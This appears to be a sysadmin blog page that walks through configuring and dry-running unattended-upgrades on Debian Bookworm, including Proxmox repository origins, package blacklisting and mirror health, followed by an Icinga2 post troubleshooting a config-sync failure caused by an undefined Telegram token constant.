Sat 2024-10-26 00:00:00 CEST 15min left    Fri 2024-10-25 00:00:00 CEST 23h ago      logrotate.timer              logrotate.service
Sat 2024-10-26 06:39:59 CEST 6h left       Fri 2024-10-25 06:56:26 CEST 16h ago      apt-daily-upgrade.timer      apt-daily-upgrade.service
Sat 2024-10-26 10:27:42 CEST 10h left      Fri 2024-10-25 08:18:00 CEST 15h ago      man-db.timer                 man-db.service
Sat 2024-10-26 11:13:30 CEST 11h left      Fri 2024-10-25 21:06:00 CEST 2h 38min ago apt-daily.timer              apt-daily.service
Sat 2024-10-26 22:43:26 CEST 22h left      Fri 2024-10-25 22:43:26 CEST 1h 0min ago  systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2024-10-27 03:10:37 CET  1 day 4h left Sun 2024-10-20 03:11:00 CEST 5 days ago   e2scrub_all.timer            e2scrub_all.service
Mon 2024-10-28 01:12:51 CET  2 days left   Mon 2024-10-21 01:40:06 CEST 4 days ago   fstrim.timer                 fstrim.service

9 timers listed.

Relevant are apt-daily.timer which activates apt-daily.service. This unit-file will execute /usr/lib/apt/apt.systemd.daily update. The script takes care of reading the necessary APT parameters and performing an apt-get update to update the package lists.

The timer apt-daily-upgrade.timer triggers the service apt-daily-upgrade.service. The unit-file will perform an /usr/lib/apt/apt.systemd.daily install and this is where the actual "apt-get upgrade-magic" happens. If the appropriate APT-values are set outstanding updates will be downloaded and installed.

Notice the absence of a specific unattended-upgrades unit-file or timer as unattended-upgrades is really just a script to automate the APT package system.

This effectively means: You are able to configure when package-list updates will be done and updates are installed by modifying the OnCalendar= parameter via drop-in files for the apt-daily(-upgrade).timer files.
The Systemd.timer documentation and man 7 systemd.time (systemd.time documentation) have all the glorious details.

I wont go into further detail regarding the /usr/lib/apt/apt.systemd.daily script. If you want to know more I recommend executing the script with bash's -x parameter (also called debug mode). This way commands and values are printed out as the script is run.

root@host:~# bash -x /usr/lib/apt/apt.systemd.daily update
# Read the output, view the script, trace the parameters and then execute:
root@host:~# bash -x /usr/lib/apt/apt.systemd.daily lock_is_held update

Or if you are more interested in the actual "How are the updates installed?"-part, perform the following:

root@host:~# bash -x /usr/lib/apt/apt.systemd.daily install
# Read the output, view the script, trace the parameters and then execute:
root@host:~# bash -x /usr/lib/apt/apt.systemd.daily lock_is_held install

It's a good lesson in understanding APT-internals/what Debian is running "under the hood".

But again: I advise you to make sure that no actual updates are installed when you do so. In order to learn how to make sure read along. 😇

How does everything work together? What makes unattended-upgrades being unattended?

Let us recapitulate. We installed the unattended-upgrades package, checked the relevant Systemd unit & timer files and had a brief look at the /usr/lib/apt/apt.systemd.daily script which is responsible for triggering the appropriate APT and unattended-upgrades commands.

APT itself is configured via the file in /etc/apt/apt.conf.d/. How can APT (or any human) know the setting of a specific parameter? Sure, you can grep through all the files - but that would also most likely include files with syntax errors etc.

Luckily there is apt-config this allows us to query APT and read specific values. This also makes sure of validating everything. If you've configured an APT-parameter in a file but apt-config doesn't reflect this - it's simply not applied and you must start to search where the error is.

Armed with this knowledge we can execute the following two commands to check if our package-lists will be updated automatically via the apt-daily.service and if unattended-upgrades will install packages. If there is no associated value, apt-config won't print out anything.

The two settings which are set inside /etc/apt/apt.conf.d/20auto-upgrades are APT::Periodic::Update-Package-Lists and APT::Periodic::Unattended-Upgrade. The first activates the automatic package-list updates while the later enables the automatic installation of updates. If we check them on our system with the manually installed unattended-upgrades package we will get the following:

root@host:~# apt-config dump APT::Periodic::Update-Package-Lists
root@host:~# apt-config dump APT::Periodic::Unattended-Upgrade

This means no package-list updates, no installation of updates. And currently this is what we want to keep experimenting a little bit before we are ready to hit production.

A working unattended-upgrades will give the following values:

root@host:~# apt-config dump APT::Periodic::Update-Package-Lists
APT::Periodic::Update-Package-Lists "1";
root@host:~# apt-config dump APT::Periodic::Unattended-Upgrade
APT::Periodic::Unattended-Upgrade "1";

First dry-run

Time to start our first unattended-upgrades dry-run. This way we can watch what would be done without actually modifying anything. I recommend utilizing the -v parameter in addition to --dry-run as else the following first 8 lines from the unattended-upgrades output itself will be omitted. Despite them being the most valuable ones for most novice users.

root@host:~# unattended-upgrades --dry-run -v
Checking if system is running on battery is skipped. Please install powermgmt-base package to check power status and skip installing updates when the system is running on battery.
Starting unattended upgrades script
Allowed origins are: origin=Debian,codename=bookworm,label=Debian, origin=Debian,codename=bookworm,label=Debian-Security, origin=Debian,codename=bookworm-security,label=Debian-Security
Initial blacklist:
Initial whitelist (not strict):
Option --dry-run given, *not* performing real actions
Packages that will be upgraded: base-files bind9-dnsutils bind9-host bind9-libs dnsutils git git-man initramfs-tools initramfs-tools-core intel-microcode libc-bin libc-l10n libc6 libc6-i386 libcurl3-gnutls libexpat1 libnss-systemd libpam-systemd libpython3.11-minimal libpython3.11-stdlib libssl3 libsystemd-shared libsystemd0 libudev1 linux-image-amd64 locales openssl python3.11 python3.11-minimal qemu-guest-agent systemd systemd-sysv systemd-timesyncd udev
Writing dpkg log to /var/log/unattended-upgrades/unattended-upgrades-dpkg.log
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure --recursive /tmp/apt-dpkg-install-o5g9u2
/usr/bin/dpkg --status-fd 10 --no-triggers --configure libsystemd0:amd64 libsystemd-shared:amd64 systemd:amd64
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/systemd-sysv_252.30-1~deb12u2_amd64.deb /var/cache/apt/archives/udev_252.30-1~deb12u2_amd64.deb /var/cache/apt/archives/libudev1_252.30-1~deb12u2_amd64.deb
/usr/bin/dpkg --status-fd 10 --no-triggers --configure libudev1:amd64
/usr/bin/dpkg --status-fd 10 --configure --pending
Preconfiguring packages ...
Preconfiguring packages ...
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libc6-i386_2.36-9+deb12u8_amd64.deb /var/cache/apt/archives/libc6_2.36-9+deb12u8_amd64.deb
/usr/bin/dpkg --status-fd 10 --no-triggers --configure libc6:amd64
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libc-bin_2.36-9+deb12u8_amd64.deb
/usr/bin/dpkg --status-fd 10 --no-triggers --configure libc-bin:amd64
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libc-l10n_2.36-9+deb12u8_all.deb /var/cache/apt/archives/locales_2.36-9+deb12u8_all.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/intel-microcode_3.20240813.1~deb12u1_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/python3.11_3.11.2-6+deb12u3_amd64.deb /var/cache/apt/archives/libpython3.11-stdlib_3.11.2-6+deb12u3_amd64.deb /var/cache/apt/archives/python3.11-minimal_3.11.2-6+deb12u3_amd64.deb /var/cache/apt/archives/libpython3.11-minimal_3.11.2-6+deb12u3_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/git_1%3a2.39.5-0+deb12u1_amd64.deb /var/cache/apt/archives/git-man_1%3a2.39.5-0+deb12u1_all.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/base-files_12.4+deb12u7_amd64.deb
/usr/bin/dpkg --status-fd 10 --no-triggers --configure base-files:amd64
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/initramfs-tools_0.142+deb12u1_all.deb /var/cache/apt/archives/initramfs-tools-core_0.142+deb12u1_all.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/bind9-dnsutils_1%3a9.18.28-1~deb12u2_amd64.deb /var/cache/apt/archives/bind9-host_1%3a9.18.28-1~deb12u2_amd64.deb /var/cache/apt/archives/bind9-libs_1%3a9.18.28-1~deb12u2_amd64.deb /var/cache/apt/archives/dnsutils_1%3a9.18.28-1~deb12u2_all.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libexpat1_2.5.0-1+deb12u1_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/qemu-guest-agent_1%3a7.2+dfsg-7+deb12u7_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libssl3_3.0.14-1~deb12u2_amd64.deb /var/cache/apt/archives/openssl_3.0.14-1~deb12u2_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libcurl3-gnutls_7.88.1-10+deb12u7_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/linux-image-6.1.0-26-amd64_6.1.112-1_amd64.deb /var/cache/apt/archives/linux-image-amd64_6.1.112-1_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
All upgrades installed
The list of kept packages can't be calculated in dry-run mode.
root@host:~#

We get told which configured origins will be used (see part 1), all packages on the black- and whitelist and which actual packages will be upgraded. Just like if you are executing apt-get upgrade manually.

Also there is the neat line Writing dpkg log to /var/log/unattended-upgrades/unattended-upgrades-dpkg.log informing us of a logfile being written. How nice!

The dpkg-commands are what normally happens in the background to install and configure the packages. In 99% of all cases this is irrelevant. Nevertheless they become invaluable when an update goes sideways or dpkg/apt can't properly configure a package.

Where do we find this information afterwards?

Logfiles

There are two logfiles being written:

  1. /var/log/unattended-upgrades/unattended-upgrades-dpkg.log
  2. /var/log/unattended-upgrades/unattended-upgrades.log

And how do they differ?

/var/log/unattended-upgrades/unattended-upgrades-dpkg.log has all output from dpkg/apt itself. You remember all these Preparing to unpack... packagename, Unpacking packagename, Setting up packagename lines? The lines you encounter when you execute apt-get manually? Who weren't present in the output from our dry-run? This gets logged into that file. So if you are wondering when a certain packages was installed or what went wrong, this is the logfile to look into.

/var/log/unattended-upgrades/unattended-upgrades.log contains the output from unattended-upgrades itself. This makes it possible to check what allowed origins/blacklists/whitelists, etc. were used in a run. Conveniently the output also includes the packages which are suitable for upgrading.

Options! Give me options!

Now that we know how we can execute a dry-run and retrace what happened it's time to have a look at the various options unattended-upgrades offers.

I recommend reading the config file /etc/apt/apt.conf.d/50unattended-upgrades once completely as the various options to fine-tune the behaviour are listed at the end. If you want unattended-upgrades to send mails, or only install updates on shutdown/reboot this is your way to go.

Or do you want an automatic reboot after unattended-upgrades has done its job (see: Unattended-Upgrade::Automatic-Reboot)? Ensuring the new kernel and system libraries are instantly used? This is your way to go.

Adding the Proxmox Repository to unattended-upgrades

Enabling updates for packages in different repositories means we have to add a new Repository to unattended-upgrades first. Using our knowledge from Part 1 and looking at the Release file for the Proxmox pve-no-subscription Debian Bookworm repository we can build the following origins-pattern:

"origin=Proxmox,codename=${distro_codename},label=Proxmox Debian Repository,a=stable";

A new dry-run will show us that the packages proxmox-default-kernel and proxmox-kernel-6.5 will be upgraded.

root@host:~# unattended-upgrades -v --dry-run
Checking if system is running on battery is skipped. Please install powermgmt-base package to check power status and skip installing updates when the system is runnin on battery.
Checking if connection is metered is skipped. Please install python3-gi package to detect metered connections and skip downloading updates.
Starting unattended upgrades script
Allowed origins are: origin=Debian,codename=bookworm,label=Debian, origin=Debian,codename=bookworm,label=Debian-Security, origin=Debian,codename=bookworm-security,labl=Debian-Security, origin=Proxmox,codename=bookworm,label=Proxmox Debian Repository,a=stable
Initial blacklist:
Initial whitelist (not strict):
Option --dry-run given, *not* performing real actions
Packages that will be upgraded: proxmox-default-kernel proxmox-kernel-6.5
Writing dpkg log to /var/log/unattended-upgrades/unattended-upgrades-dpkg.log
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/proxmox-kernel-6.8.8-2-pve-signed_6.8.8-2_amd64.deb /var/cache/apt/archves/proxmox-kernel-6.8_6.8.8-2_all.deb /var/cache/apt/archives/proxmox-default-kernel_1.1.0_all.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/proxmox-kernel-6.5.13-5-pve-signed_6.5.13-5_amd64.deb /var/cache/apt/arhives/proxmox-kernel-6.5_6.5.13-5_all.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
All upgrades installed
The list of kept packages can't be calculated in dry-run mode.

In the next step we will use this to see how blacklisting works.

Note: Enabling unattended-upgrades for the Proxmox packages on the Proxmox host itself is a controversial topic. In clustered & productive setups I wouldn't recommend it too. But given this is my single-node, homelab Proxmox I have no problem with it.

However I have no problem with enabling OS updates as this is no different from what Proxmox themselves do/recommend: https://pve.proxmox.com/pve-docs/pve-admin-guide.html#system_software_updates

Blacklisting packages

Excluding a certain package from the automatic updates can be done in two different ways. Either you don't include the repository into the Unattended-Upgrade::Origins-Pattern block - effectively excluding all packages in the repository. Or you exclude only single packages by listing them inside the Unattended-Upgrade::Package-Blacklist block. The configuration file has examples for the various patterns needed (exact match, name beginning with a certain string, escaping, etc.)

The following line will blacklist all packages starting with proxmox- in their name.

Unattended-Upgrade::Package-Blacklist {
    // The following matches all packages starting with linux-
    //  "linux-";

    // Blacklist all proxmox- packages
    "proxmox-";

    [...]
};

Executing a dry-run again will give the following result:

root@host:~# unattended-upgrades -v --dry-run
Checking if system is running on battery is skipped. Please install powermgmt-base package to check power status and skip installing updates when the system is running on battery.
Checking if connection is metered is skipped. Please install python3-gi package to detect metered connections and skip downloading updates.
Starting unattended upgrades script
Allowed origins are: origin=Debian,codename=bookworm,label=Debian, origin=Debian,codename=bookworm,label=Debian-Security, origin=Debian,codename=bookworm-security,label=Debian-Security, origin=Proxmox,codename=bookworm,label=Proxmox Debian Repository,a=stable
Initial blacklist: proxmox-
Initial whitelist (not strict):
No packages found that can be upgraded unattended and no pending auto-removals
The list of kept packages can't be calculated in dry-run mode.

"The following packages have been kept back" - What does this mean? Will unattended-upgrades help me?

Given is the following output from a manual apt-get upgrade run.

root@host:~# apt-get upgrade
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Calculating upgrade... Done
The following packages have been kept back:
  proxmox-default-kernel proxmox-kernel-6.5
0 upgraded, 0 newly installed, 0 to remove and 2 not upgraded.

The message means that the packages are part of so-called PhasedUpdates. Sadly documentation regarding this in Debian is a bit sparse. The manpage for apt_preference(5) has a paragraph about it but that's pretty much it.

Ubuntu has a separate Wiki article about it, as their update manager honors the setting: https://wiki.ubuntu.com/PhasedUpdates

What it means is that some updates won't be rolled out to all servers immediately. Instead a random number is generated which determines if the update is applied or not.

Quote from apt_preferences(5):
"A system's eligibility to a phased update is determined by seeding random number generator with the package source name, the version number, and /etc/machine-id, and then calculating an integer in the range [0, 100]. If this integer is larger than the Phased-Update-Percentage, the version is pinned to 1, and thus held back. Otherwise, normal policy rules apply."

Unattended-upgrades however will ignore this and install the updates. If that is good or bad depends on your situation. Luckily there was some recent activity in the GitHub Issue regarding this topic, so it may be resolved soon-ish: unattended-upgrades on GitHub, issue 259: Please honor Phased-Update-Percentage for package versions

Enabling unattended-upgrades

Now it's finally time to enable unattended-upgrades for our system. Execute dpkg-reconfigure -f noninteractive unattended-upgrades and check that the /etc/apt/apt.conf.d/20auto-upgrades file is present with the following content:

root@host:~# cat /etc/apt/apt.conf.d/20auto-upgrades
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Unattended-Upgrade "1";

After that verify that APT has indeed the correct values for those parameters:

root@host:~# apt-config dump APT::Periodic::Update-Package-Lists
APT::Periodic::Update-Package-Lists "1";
root@host:~# apt-config dump APT::Periodic::Unattended-Upgrade
APT::Periodic::Unattended-Upgrade "1";

You are then able to determine when the first run will happen by checking via systemctl list-timers apt-daily.timer apt-daily-upgrade.timer.

root@host:~# systemctl list-timers apt-daily.timer apt-daily-upgrade.timer
NEXT                        LEFT          LAST                        PASSED  UNIT                    ACTIVATES
Sat 2024-10-26 03:39:58 UTC 16min left    Fri 2024-10-25 09:12:58 UTC 18h ago apt-daily.timer         apt-daily.service
Sat 2024-10-26 06:21:30 UTC 2h 58min left Fri 2024-10-25 06:24:40 UTC 20h ago apt-daily-upgrade.timer apt-daily-upgrade.service

Set yourself a reminder in your calendar to check the logfiles and enjoy your automatic updates!

How to check the health of a Debian mirror

Remember how I, in part 1 of this series, mentioned that Debian mirrors are rarely out-of-sync, etc.? Yep, and now it happened while I was typing this post. The perfect opportunity to show you how to check your Debian mirror.

The error I got was the following:

root@host:~# apt-get update
Hit:1 http://security.debian.org/debian-security bookworm-security InRelease
Hit:2 http://debian.tu-bs.de/debian bookworm InRelease
Get:3 http://debian.tu-bs.de/debian bookworm-updates InRelease [55.4 kB]
Reading package lists... Done
E: Release file for http://debian.tu-bs.de/debian/dists/bookworm-updates/InRelease is expired (invalid since 16d 0h 59min 33s). Updates for this repository will not be applied.

The reason is that the InRelease file contains a Valid-Until timestamp. And currently it has the following value:
Valid-Until: Sat, 22 Jun 2024 20:12:12 UTC

As this error originates on a remote host there is nothing I can do apart from switching to another Debian repository.

But how can you actually check that? https://mirror-master.debian.org/status/mirror-status.html lists the status of all Debian Mirrors. If we search for debian.tu-bs.de we can see that the mirror indeed has problems and since when the error exists.

Side note: Checking the mirror hierarchy can also be relevant sometimes: https://mirror-master.debian.org/status/mirror-hierarchy.html

Also.. 22 days without noticing that the Debian mirror I use is broken? Yeah.. Let's define a monitoring check for that. Something I didn't do for my setup at home.

As this would make this article unnecessarily larger I made a separate blog post about it. So feel free to read this next: How to monitor your APT-repositories with Icinga

Comments

Icinga2 error "check command does not exist" because of missing constant

Photo by Christina Morillo: https://www.pexels.com/photo/software-engineer-standing-beside-server-racks-1181354/

Apparently this problem kept me busy far too long, as I kept looking into the Icinga2 Master logfiles only. Main due to the service definition for my icinga CheckCommand still being from a time when it was only one Master without any Agents. This lead to it being executed on the Master and hence I never saw the problems on the agent..

Additionally the cluster and cluster-health checks only check if all endpoints are connected. Which was the case all the time. Therefore I got no error there too.

But what happened?

I defined a new CheckCommand. It worked fine on the master. Then I re-rewrote the service apply-Rule so that it matches for all Linux hosts being monitored. And then I got Check command not found for all these new service checks on all agent hosts.

I deleted the API config sync directories and restarted Icinga2 on the agents to trigger a new sync:

root@agent:/etc/icinga2# rm /var/lib/icinga2/api/zones-stage/* -rf && rm /var/lib/icinga2/api/zones/* -rf
root@agent:/etc/icinga2# systemctl restart icinga2.service

And suddenly all CheckCommands which are not part of the Icinga Template Library stopped working on the agents.

Uhm, ok. At this point I suspected I had somehow messed up my /etc/icinga2/zones.conf file some time ago. Turns out, this wasn't the case.

The root cause

Some weeks ago I defined a service check which is only executed on my Icinga2 master. However I stored the CheckCommand and Service-Configuration under /etc/icinga2/zones.d/master anyway as you never know when this comes in handy. (This has since been corrected in the article.) But the Telegram API requires a Token. And I defined that in /etc/icinga2/constants.conf - but this file isn't synced as it is outside of /etc/icinga2/zones.d/master. Something which I did on purpose, as I didn't want to sync the Token to all agents.

This apparently caused the config file sync to run into an syntax error as the constant for the Token couldn't be resolved.
But again.. This was only logged in the logfiles on the agents..

root@agent:/etc/icinga2# cat /var/log/icinga2/icinga2.log
[...]
[2024-07-17 22:39:04 +0200] information/ApiListener: Received configuration for zone 'global-templates' from endpoint 'master.domain.tld'. Comparing the timestamp and checksums.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/eventcommands.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/groups.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/host-templates.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/notifications.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/service-templates.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/telegrambot-notifications.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/templates.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/timeperiods.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/users.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Applying configuration file update for path '/var/lib/icinga2/api/zones-stage/global-templates' (6688 Bytes).
[2024-07-17 22:39:04 +0200] information/ApiListener: Received configuration updates (2) from endpoint 'master.domain.tld' are different to production, triggering validation and reload.
[2024-07-17 22:39:04 +0200] critical/ApiListener: Config validation failed for staged cluster config sync in '/var/lib/icinga2/api/zones-stage/'. Aborting. Logs: '/var/lib/icinga2/api/zones-stage//startup.log'
[...]

The /var/lib/icinga2/api/zones-stage/startup.log has the details:

root@agent:/etc/icinga2# cat /var/lib/icinga2/api/zones-stage/startup.log
[2024-07-17 23:36:19 +0200] information/cli: Icinga application loader (version: r2.12.3-1)
[2024-07-17 23:36:19 +0200] information/cli: Loading configuration file(s).
[2024-07-17 23:36:19 +0200] information/ConfigItem: Committing config item(s).
[2024-07-17 23:36:19 +0200] critical/config: Error: Error while evaluating expression: Tried to access undefined script variable 'TelegramBotToken'
Location: in /var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf: 46:26-46:41
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(44):     HOSTDISPLAYNAME = "$host.display_name$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(45):     SERVICEDISPLAYNAME = "$service.display_name$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(46):     TELEGRAM_BOT_TOKEN = TelegramBotToken
                                                                                                               ^^^^^^^^^^^^^^^^
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(47):     TELEGRAM_CHAT_ID = "$user.vars.telegram_chat_id$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(48):

[2024-07-17 23:36:19 +0200] critical/config: Error: Error while evaluating expression: Tried to access undefined script variable 'TelegramBotToken'
Location: in /var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf: 20:26-20:41
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(18):     NOTIFICATIONCOMMENT = "$notification.comment$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(19):     HOSTDISPLAYNAME = "$host.display_name$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(20):     TELEGRAM_BOT_TOKEN = TelegramBotToken
                                                                                                               ^^^^^^^^^^^^^^^^
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(21):     TELEGRAM_CHAT_ID = "$user.vars.telegram_chat_id$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(22):

[2024-07-17 23:36:19 +0200] critical/config: 2 errors
[2024-07-17 23:36:19 +0200] critical/cli: Config validation failed. Re-run with 'icinga2 daemon -C' after fixing the config.

However... The tricky part is that a config validation will succeed!

root@agent:/etc/icinga2# icinga2 daemon -C
[2024-07-18 00:00:16 +0200] information/cli: Icinga application loader (version: r2.12.3-1)
[2024-07-18 00:00:16 +0200] information/cli: Loading configuration file(s).
[2024-07-18 00:00:16 +0200] information/ConfigItem: Committing config item(s).
[2024-07-18 00:00:16 +0200] information/ApiListener: My API identity: agent.domaint.tld
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 1 CheckerComponent.
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 5 Zones.
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 1 IcingaApplication.
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 2 Endpoints.
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 1 FileLogger.
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 235 CheckCommands.
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 1 ApiListener.
[2024-07-18 00:00:16 +0200] information/ScriptGlobal: Dumping variables to file '/var/cache/icinga2/icinga2.vars'
[2024-07-18 00:00:16 +0200] information/cli: Finished validating the configuration file(s).

And this was the reason why I was too focused on the master..

What I learned later is, that you can utilize the following command to validate the configuration from the stage-dir.
Documentation for the Config Sync: Receive Config is here.

root@agent:/var/log/icinga2# icinga2 daemon -C --define System.ZonesStageVarDir=/var/lib/icinga2/api/zones-stage/
[2024-07-21 16:28:51 +0200] information/cli: Icinga application loader (version: r2.12.3-1)
[2024-07-21 16:28:51 +0200] information/cli: Loading configuration file(s).
[2024-07-21 16:28:51 +0200] information/ConfigItem: Committing config item(s).
[2024-07-21 16:28:51 +0200] critical/config: Error: Error while evaluating expression: Tried to access undefined script variable 'TelegramBotToken'
Location: in /var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf: 20:26-20:41
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(18):     NOTIFICATIONCOMMENT = "$notification.comment$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(19):     HOSTDISPLAYNAME = "$host.display_name$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(20):     TELEGRAM_BOT_TOKEN = TelegramBotToken
                                                                                                               ^^^^^^^^^^^^^^^^
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(21):     TELEGRAM_CHAT_ID = "$user.vars.telegram_chat_id$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(22):

[2024-07-21 16:28:51 +0200] critical/config: Error: Error while evaluating expression: Tried to access undefined script variable 'TelegramBotToken'
Location: in /var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf: 46:26-46:41
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(44):     HOSTDISPLAYNAME = "$host.display_name$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(45):     SERVICEDISPLAYNAME = "$service.display_name$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(46):     TELEGRAM_BOT_TOKEN = TelegramBotToken
                                                                                                               ^^^^^^^^^^^^^^^^
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(47):     TELEGRAM_CHAT_ID = "$user.vars.telegram_chat_id$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(48):

[2024-07-21 16:28:51 +0200] critical/config: 2 errors
[2024-07-21 16:28:51 +0200] critical/cli: Config validation failed. Re-run with 'icinga2 daemon -C' after fixing the config.

The solution

On the master I moved the 2 files from /etc/icinga2/zones.d to /etc/icinga2/conf.d and restarted the service.

root@master:/etc/icinga2# mv /etc/icinga2/zones.d/global-commands/telegrambot-commands.conf /etc/icinga2/conf.d/
root@master:/etc/icinga2# mv /etc/icinga2/zones.d/global-templates/telegrambot-notifications.conf /etc/icinga2/conf.d/
root@master:/etc/icinga2# systemctl restart icinga2.service

On the agent a simple restart is enough:

root@agent:/etc/icinga2# systemctl restart icinga2.service

And after that everything worked again.

Another problem detected - an even deeper rooted cause

In the aftermath I was curious why & how Icinga didn't notify me that the config in the stage-dir couldn't be validated. Shouldn't there be some kind of included check for this?

Yes, turns out the built-in Icinga CheckCommand does exactly this. But it was never executed on my agent. As I still had a service definition from a time when I didn't have any agents. Initially the configuration was the following:

// Checks the agent health
apply Service "icinga" {
  import "generic-service"

  check_command = "icinga"

  assign where (host.address || host.address6) && host.vars.os == "Linux"
}

This was still a remnant of having only the Icinga Master and no agents. But this lead to it being executed on the Master. Which is... Not smart if you want to validate the configuration on the Agent.

After changing it to the following:

// Checks the agent health - must be executed on the agent
apply Service "icinga" {
  import "generic-service"

  check_command = "icinga"

  command_endpoint = host.vars.agent_endpoint

  assign where host.vars.agent_endpoint
}

The check worked as intended.

Oh, and I opened a pull request to enhance Icinga's documentation regarding the config sync: https://github.com/Icinga/icinga2/pull/10101. Let's see if it get's accepted.

Comments

Using and configuring unattended-upgrades under Debian Bookworm - Part 1: Preparations

Photo by Markus Winkler: https://www.pexels.com/photo/wood-writing-mathematics-typography-19915915/

Preface

